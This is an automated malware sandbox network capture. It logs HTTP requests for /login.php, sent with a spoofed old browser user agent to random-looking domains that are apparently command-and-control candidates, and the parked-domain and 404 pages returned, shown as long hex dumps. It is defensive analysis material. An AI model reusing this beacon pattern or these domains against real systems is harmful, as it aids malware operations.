                                                                                                                                                                                                          Data Ascii: set="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:10
                                                                                                                                                                                                          2024-11-11 17:24:36 UTC1369INData Raw: 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76
                                                                                                                                                                                                          Data Ascii: ing:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{v
                                                                                                                                                                                                          2024-11-11 17:24:36 UTC1369INData Raw: 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79
                                                                                                                                                                                                          Data Ascii: 00%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-ty
                                                                                                                                                                                                          2024-11-11 17:24:36 UTC1369INData Raw: 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69
                                                                                                                                                                                                          Data Ascii: tml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;posi
                                                                                                                                                                                                          2024-11-11 17:24:36 UTC1369INData Raw: 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30
                                                                                                                                                                                                          Data Ascii: y:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0
                                                                                                                                                                                                          2024-11-11 17:24:36 UTC1369INData Raw: 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74
                                                                                                                                                                                                          Data Ascii: not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-ampht
                                                                                                                                                                                                          2024-11-11 17:24:36 UTC1369INData Raw: 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70
                                                                                                                                                                                                          Data Ascii: m:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!imp
                                                                                                                                                                                                          2024-11-11 17:24:36 UTC1369INData Raw: 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e
                                                                                                                                                                                                          Data Ascii: idden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accordion


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          10192.168.2.85353175.2.71.199443
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:25:54 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC352INHTTP/1.1 200 OK
                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                          Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:55 GMT
                                                                                                                                                                                                          Etag: "3jk05lyot219wv"
                                                                                                                                                                                                          Server: Caddy
                                                                                                                                                                                                          Server: awselb/2.0
                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                          X-Powered-By: Next.js
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC2372INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31
                                                                                                                                                                                                          Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC1724INData Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f
                                                                                                                                                                                                          Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC4744INData Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e
                                                                                                                                                                                                          Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC5930INData Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e
                                                                                                                                                                                                          Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC7116INData Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20
                                                                                                                                                                                                          Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                          Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                          Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                          Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                          Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          11192.168.2.853540188.114.96.3443
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:25:56 UTC959INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:56 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1q%2FLtAjLrraWfZWMWr6k9FNeLWhoeB6mvFaA4%2FPSwWbjHXUmeH04%2FkkSuj%2BX9M0UVbfUxC74hrhiT%2FFbwnSOw%2Ffq%2B6K8ezY8Hp4XS7%2FpPuxT0oegprFZw1wbgaHK%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffbffeadb182d-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2473099&cwnd=251&unsent_bytes=0&cid=e42556b4c044e8f3&ts=796&x=0"
